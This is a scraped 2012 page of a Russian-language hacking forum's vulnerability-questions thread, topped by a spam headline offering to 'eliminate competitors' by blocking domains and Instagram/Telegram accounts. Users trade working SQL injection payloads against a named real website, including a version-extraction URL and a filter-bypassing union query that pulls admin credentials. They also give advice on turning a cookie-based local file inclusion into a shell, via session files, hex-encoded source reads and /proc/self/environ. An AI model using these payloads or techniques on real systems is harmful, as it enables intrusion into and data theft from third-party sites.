УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2118 из 2438

2118

Опции темы

Поиск в этой теме

Опции просмотра

#21171

08.08.2012, 17:57

apoclepsis

Guest

Сообщений: n/a

Провел на форуме:
1885

Репутация: 0

Цитата:

Сообщение от OxoTnik

OxoTnik said:
Ну раз ШОП, то линк в студию)) (в личку кинь посотрю)

ОК раскроем карты http://biz.podolsk.ru/picturebrowse.php?catid=15

я не волшебник. я только учусь))) испробовал море всего уязвимость 100%

а застрял то в самом начале.

у?catid=15-7 производит вычисление catid=8

?catid=15 group by 1 вроде все норм ?catid=15 group by 2 уже облом выходит что 1? хм странно!? походу тут фильтрация union

вот тут собственно я заработал шизофрению!

моя проблема в том что я не могу догнать логику раскручивания фильтрации. прошу помощи и так сказать носом ткнуть.

#21172

08.08.2012, 18:16

cat1vo

Новичок

Регистрация: 12.08.2009

Сообщений: 1

Провел на форуме:
11937

Репутация: 0

Цитата:

Сообщение от apoclepsis

apoclepsis said:
ОК раскроем карты http://biz.podolsk.ru/picturebrowse.php?catid=15
я не волшебник. я только учусь))) испробовал море всего уязвимость 100%
а застрял то в самом начале.
у?catid=15-7 производит вычисление catid=8
?catid=15 group by 1 вроде все норм ?catid=15 group by 2 уже облом выходит что 1? хм странно!? походу тут фильтрация union
вот тут собственно я заработал шизофрению!
моя проблема в том что я не могу догнать логику раскручивания фильтрации. прошу помощи и так сказать носом ткнуть.

Код:

Code:
http://biz.podolsk.ru/picturebrowse.php?catid=15+and+mid(version(),1,1)=5--+-

Version: 5.1.60

#21173

09.08.2012, 06:26

cipa21

Новичок

Регистрация: 09.04.2009

Сообщений: 8

Провел на форуме:
71852

Репутация: 0

-146+union+/*!select*/+1,2,(/*!select+admin+from+admins*/),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22

Вместо конструкции select+admin+from+admins можно подставить UPDATE запрос? А то что-то у меня не выходит?

#21174

09.08.2012, 07:11

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

Цитата:

Сообщение от cipa21

cipa21 said:
-146+union+/*!select*/+1,2,(/*!select+admin+from+admins*/),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22
Вместо конструкции
select+admin+from+admins
можно подставить UPDATE запрос? А то что-то у меня не выходит?

нельзя

#21175

11.08.2012, 03:20

package

Guest

Сообщений: n/a

Провел на форуме:
2364

Репутация: 0

SELECT g.id FROM categories g LEFT JOIN msk.categories l ON g.id=l.id WHERE (g.spr_sel_super>0 OR l.sel_super>0) AND g.spr_visible=1 AND l.visible=1 ORDER BY IF(g.spr_sel_super>0, g.spr_sel_super, l.sel_super) DESC, RAND() LIMIT [SQL]

Как можно заюзать?

я всю голову сломал

Обычный union не берет вроде

#21176

11.08.2012, 03:24

cat1vo

Новичок

Регистрация: 12.08.2009

Сообщений: 1

Провел на форуме:
11937

Репутация: 0

В LIMIT Sql injection не раскрутите

#21177

11.08.2012, 03:25

package

Guest

Сообщений: n/a

Провел на форуме:
2364

Репутация: 0

Цитата:

Сообщение от cat1vo

cat1vo said:
В LIMIT Sql injection не раскрутите, если конечно уязвим не второй параметр.

В смысле второй?

я могу же и LIMIT 1 и LIMIT 1,1

#21178

13.08.2012, 23:49

Unknown

Guest

Сообщений: n/a

Провел на форуме:
6070

Репутация: 5

Помогите советом.

Есть LFI но в параметре кукисов.

Логи не удалось найти, но можно подключать сессию.

Первая проблема это какие варианты в сессию запихнуть шелл (типа CMD), пытался в имени вставить, вставляет, но в сессии строки нет.

Хотел прочитать php файлы, но они выдаются уже исполненные. исходник не удается прочитать, может есть какие-то варианты?

#21179

13.08.2012, 23:54

Unknown

Guest

Сообщений: n/a

Провел на форуме:
28262

Репутация: 23

Цитата:

Сообщение от Teratex

Teratex said:
Помогите советом.
Есть LFI но в параметре кукисов.
Логи не удалось найти, но можно подключать сессию.
Первая проблема это какие варианты в сессию запихнуть шелл (типа CMD), пытался в имени вставить, вставляет, но в сессии строки нет.
Хотел прочитать php файлы, но они выдаются уже исполненные. исходник не удается прочитать, может есть какие-то варианты?

Для прочтение файлов php, попросту захексь их и всё. Дальше подключение найди к базе.

#21180

13.08.2012, 23:59

VY_CMa

Guest

Сообщений: n/a

Провел на форуме:
193811

Репутация: 724

Цитата:

Сообщение от Teratex

Teratex said:
Логи не удалось найти

/proc/self/environ - тоже не удалось найти?

Страница 2118 из 2438

2118

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)

Быстрый переход